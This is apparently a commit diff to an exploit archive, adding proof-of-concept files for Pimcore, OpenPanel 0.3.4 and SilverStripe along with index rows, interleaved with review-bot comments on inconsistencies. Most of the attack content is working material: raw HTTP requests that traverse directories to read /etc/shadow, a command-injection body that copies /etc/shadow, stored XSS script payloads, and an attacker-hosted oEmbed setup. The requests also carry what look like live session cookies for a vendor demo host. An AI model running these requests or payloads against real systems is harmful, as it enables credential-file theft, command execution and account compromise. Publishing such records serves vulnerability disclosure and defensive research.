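+### Proof of Concept (PoC):
+1. Log in to the Pimcore backend as a user with access to the Data Object
+Classification Store.
+2. Navigate to the Classification Store and create or edit a key.
+3. Inject the following payload into the key value:
+```html
+<script>alert('XSS')</script>
+4. Save the file and view it in the frontend or backend. The JavaScript
+alert will execute, demonstrating the vulnerability.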
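Review bot: The ```html fence opened before `<script>alert('XSS')</script>` is never closed, so step 4 renders inside the code block; add a closing ``` line directly after the payload. The title `Authenticated Stored Cross-Site Scripting (XSS) Via Search` (with `Document` wrapped onto its own line) names a search feature, while the description and PoC describe the Data Object Classification Store, and the index row for 52194 says "Pimcore 11.4.2" where the header says 10.5.x prior to 10.5.21 and 11.x prior to 11.1.1 — title, header and index should agree on the component and affected versions. The file has a .py extension but contains only markdown; a .txt extension, as the other advisories in this commit use, would match its content.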
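--- a/exploits/multiple/webapps/52195.txt
+++ b/exploits/multiple/webapps/52195.txt
@@ -0,0 +1,80 @@
+# Exploit Title: OpenPanel 0.3.4 - Directory Traversal
+# Date: Dec 05, 2024
+# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
+# Vendor Homepage: https://openpanel.com/
+# Software Link: https://openpanel.com/
+# Version: 0.3.4
+# Tested on: macOS
+# CVE : CVE-2024-53537
+
+### Compress Function ###
+POST /compress_files HTTP/2
+Host: demo.openpanel.org:2083
+Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://demo.openpanel.org:2083/files/
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 96
+Origin: https://demo.openpanel.org:2083
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Priority: u=0
+Te: trailers
+
+archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar
+
+### Copy Function ###
+POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
+Host: demo.openpanel.org:2083
+Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://demo.openpanel.org:2083/files/
+Origin: https://demo.openpanel.org:2083
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Priority: u=0
+Content-Length: 0
+Te: trailers
+
+
+### Download Function ###
+GET /download_file/shadow?path_param=/etc HTTP/2
+Host: demo.openpanel.org:2083
+Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://demo.openpanel.org:2083/files/
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Priority: u=0, i
+Te: trailers
+
+
+### View Function ###
+GET /view_file?filename=shadow&path_param=/etc HTTP/2
+Host: demo.openpanel.org:2083
+Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://demo.openpanel.org:2083/files/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Priority: u=0
+Te: trailers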
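Review bot: Each request carries what looks like a live session token (`Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw...`) against the vendor's public demo host `demo.openpanel.org:2083`; the same token and host recur in 52196.txt, 52197.txt and 52198.txt and should be replaced with placeholders such as `<SESSION>` and `<TARGET>` so the archive neither publishes a credential nor points readers at a third-party system. The four functions differ in which parameter carries the path (`pathParam=../../etc` in Compress, `path_param=/etc` in Copy, Download and View); one sentence per function naming the unvalidated parameter and the expected response would let a defender confirm both the issue and a fix. The index row for 52195–52198 lists the authors as "Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee" while the file header says `Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee`, and 52196 and 52198 both cite `CVE-2024-53582` while describing different issues (access control vs. file-manager traversal), so the author and CVE fields should be checked against the records.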
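--- a/exploits/multiple/webapps/52196.txt
+++ b/exploits/multiple/webapps/52196.txt
@@ -0,0 +1,23 @@
+# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
+# Date: Nov 25, 2024
+# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
+# Vendor Homepage: https://openpanel.com/
+# Software Link: https://openpanel.com/
+# Version: 0.3.4
+# Tested on: macOS
+# CVE : CVE-2024-53582
+
+GET /files/../.. HTTP/2
+Host: demo.openpanel.org:2083
+Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://demo.openpanel.org:2083/files/
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Priority: u=0
+Te: trailers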
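--- a/exploits/multiple/webapps/52197.txt
+++ b/exploits/multiple/webapps/52197.txt
@@ -0,0 +1,27 @@
+# Exploit Title: OpenPanel 0.3.4 - OS Command Injection
+# Date: Nov 25, 2024
+# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
+# Vendor Homepage: https://openpanel.com/
+# Software Link: https://openpanel.com/
+# Version: 0.3.4
+# Tested on: macOS
+# CVE : CVE-2024-53584
+
+POST /server/timezone HTTP/2
+Host: demo.openpanel.org:2083
+Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://demo.openpanel.org:2083/server/timezone
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 51
+Origin: https://demo.openpanel.org:2083
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Priority: u=0
+Te: trailers
+
+timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt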
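Review bot: The body `timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt` shows the injected value but the record does not say how success is observed (the HTTP response, or the presence of the written file) nor which handler presumably passes `timezone` to a shell, so a reader cannot tell a patched host from an unpatched one; a sentence on each would make the PoC verifiable. It would also help defenders to note the fix to look for: the value should be checked against the system's known zone names rather than interpolated into a command. The session token and demo host issue is the same as raised on 52195.txt.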
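--- a/exploits/multiple/webapps/52198.txt
+++ b/exploits/multiple/webapps/52198.txt
@@ -0,0 +1,22 @@
+# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
+# Date: Nov 25, 2024
+# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
+# Vendor Homepage: https://openpanel.com/
+# Software Link: https://openpanel.com/
+# Version: 0.3.4
+# Tested on: macOS
+# CVE : CVE-2024-53582
+
+GET /view_file?filename=shadow&path_param=/etc HTTP/2
+Host: demo.openpanel.org:2083
+Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://demo.openpanel.org:2083/files/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Priority: u=0
+Te: trailers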
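--- a/exploits/multiple/webapps/52199.txt
+++ b/exploits/multiple/webapps/52199.txt
@@ -0,0 +1,55 @@
+# Exploit Title: SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 2025-01-15
+# Exploit Author: James Nicoll
+# Vendor Homepage: https://www.silverstripe.org/
+# Software Link: https://www.silverstripe.org/download/
+# Category: Web Application
+# Version: 5.2.22
+# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04
+# CVE : CVE-2024-47605
+
+## Explanation:
+When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website.
+
+## Requirements
+1. A Silverstripe CMS website.
+2. Valid login credentials for a user with page edit rights.
+3. An attacker server hosting malicious payload.
+
+## On the attacker server:
+1. Create an html file with oembded information:
+```
+<html>
+<head>
+<link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" />
+</head>
+<body>
+<img src="media.jpg">
+</body>
+</html>
+```
+2. Create the json file with XSS payload:
+```
+{
+"title": "Title",
+"author_name": "author",
+"type": "video",
+"height": 113,
+"width": 200,
+"version": "1.0",
+"provider_name": "FakeSite",
+"thumbnail_height": 360,
+"thumbnail_width": 480,
+"thumbnail_url": "http://<attacker_server_ip>/media.jpg",
+"html":"<script>alert('hello world');</script>"
+}
+```
+3. The media.jpg file can be any image.
+4. Host these files on a publicly available website
+
+## On the SilverStripe website:
+1. Log into the admin portal with a user account that has page editor rights (or higher).
+2. Select the page you wish to load the malicious content into.
+3. Within the editor panel, select the "Insert Media via URL" button.
+4. Enter the IP/Hostname of the attacker server.
+5. Click Add Media, Insert Media, and then save and publish the page.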
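Review bot: The header `# Exploit Title: SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)` names 5.3.8 while `# Version: 5.2.22` and `# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04` name 5.2.22, and the index row repeats 5.3.8; the affected and tested versions should be stated consistently, ideally together with the first fixed release so an operator can confirm they are patched. Step 2 would be clearer with one sentence tying it to the Explanation — it is the oEmbed `"html"` field that is inserted in place of the embed shortcode without sanitization — so a defender knows that this field is the one to encode or strip. "oembded" in `1. Create an html file with oembded information:` should read "oEmbed".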
|
@ -10406,6 +10406,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,,
|
||||
52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-13,0,CVE-2024-33896,,,,,
|
||||
52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
|
||||
52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,,
|
||||
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
|
||||
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
|
||||
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
|
||||
|
@ -10916,6 +10917,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
23136,exploits/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,remote,multiple,,2003-09-10,2012-12-04,1,OSVDB-2531,,,,,https://www.securityfocus.com/bid/8583/info
|
||||
35805,exploits/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",remote,multiple,,2011-05-28,2015-01-17,1,,,,,,https://www.securityfocus.com/bid/48030/info
|
||||
35792,exploits/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 - File Transfer Cross-Site Scripting",2011-05-24,"Kacper Szczesniak",remote,multiple,,2011-05-24,2015-01-15,1,,,,,,https://www.securityfocus.com/bid/47957/info
|
||||
52200,exploits/multiple/remote/52200.txt,"GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50858,,,,,
|
||||
52203,exploits/multiple/remote/52203.txt,"GestioIP 3.5.7 - Cross-Site Scripting (XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50857,,,,,
|
||||
52202,exploits/multiple/remote/52202.txt,"GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50859,,,,,
|
||||
52204,exploits/multiple/remote/52204.txt,"GestioIP 3.5.7 - Remote Command Execution (RCE)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-48760,,,,,
|
||||
52201,exploits/multiple/remote/52201.txt,"GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50861,,,,,
|
||||
41684,exploits/multiple/remote/41684.rb,"GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,remote,multiple,,2017-03-23,2017-03-23,1,CVE-2013-0758;CVE-2013-0757,,,,,https://github.com/rapid7/metasploit-framework/blob/1d617ae3894222cfbbf6951fcd68fd2d1c1b15c6/modules/exploits/multi/http/git_client_command_exec.rb
|
||||
33990,exploits/multiple/remote/33990.rb,"Gitlist - Remote Command Execution (Metasploit)",2014-07-07,Metasploit,remote,multiple,80,2014-07-07,2014-07-08,1,CVE-2014-4511;OSVDB-108504;CVE-2013-7392,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-08-at-64236-pm.png,http://www.exploit-db.comgitlist-0.4.0.tar.gz,
|
||||
33929,exploits/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,remote,multiple,,2014-06-30,2014-07-08,1,CVE-2014-5023;OSVDB-108504;OSVDB-108503;CVE-2014-4511;CVE-2013-7392,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-08-at-62343-pm.png,http://www.exploit-db.comgitlist-0.4.0.tar.gz,
|
||||
|
@ -12182,6 +12188,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,,2021-01-27,2021-03-18,1,,,,,,
|
||||
49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,,2021-02-11,2021-03-18,1,,,,,,
|
||||
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,,2021-03-15,2021-03-16,0,CVE-2021-27695,,,,,
|
||||
52195,exploits/multiple/webapps/52195.txt,"OpenPanel 0.3.4 - Directory Traversal",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53537,,,,,
|
||||
52196,exploits/multiple/webapps/52196.txt,"OpenPanel 0.3.4 - Incorrect Access Control",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53582,,,,,
|
||||
52197,exploits/multiple/webapps/52197.txt,"OpenPanel 0.3.4 - OS Command Injection",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53584,,,,,
|
||||
52198,exploits/multiple/webapps/52198.txt,"OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53582,,,,,
|
||||
46118,exploits/multiple/webapps/46118.txt,"OpenSource ERP 6.3.1. - SQL Injection",2019-01-10,"Emre ÖVÜNÇ",webapps,multiple,80,2019-01-10,2019-01-10,0,CVE-2019-5893,"SQL Injection (SQLi)",,,http://www.exploit-db.comerp_6.3.1.exe,
|
||||
38640,exploits/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2015-1793;OSVDB-124300,,,,,
|
||||
49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Kamil Breński",webapps,multiple,,2021-02-19,2021-02-19,0,,,,,,
|
||||
|
@ -12239,7 +12249,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
|
||||
49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
|
||||
46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,,
|
||||
52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,,
|
||||
35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
|
||||
52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
|
||||
49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,,
|
||||
50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,,
|
||||
34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",webapps,multiple,,2010-06-21,2014-07-22,1,,,,,,https://www.securityfocus.com/bid/40813/info
|
||||
|
@ -12309,6 +12321,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,webapps,multiple,,2015-04-21,2015-04-21,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1314
|
||||
51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
|
||||
48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
|
||||
52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
|
||||
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
|
||||
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
|
||||
52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
|
||||
|
@ -12453,6 +12466,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
11404,exploits/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,,,,,,
|
||||
33578,exploits/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,webapps,multiple,,2009-07-16,2017-07-19,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37999/info
|
||||
10170,exploits/multiple/webapps/10170.txt,"Xerver 4.31/4.32 - HTTP Response Splitting",2009-11-18,s4squatch,webapps,multiple,80,2009-11-17,,1,CVE-2009-4086;OSVDB-60657,,,,http://www.exploit-db.comxerver_432.zip,
|
||||
52192,exploits/multiple/webapps/52192.py,"Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection",2025-04-14,hyp3rlinx,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2019-19245,,,,,
|
||||
49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
|
||||
34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info
|
||||
49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,,
|
||||
|
|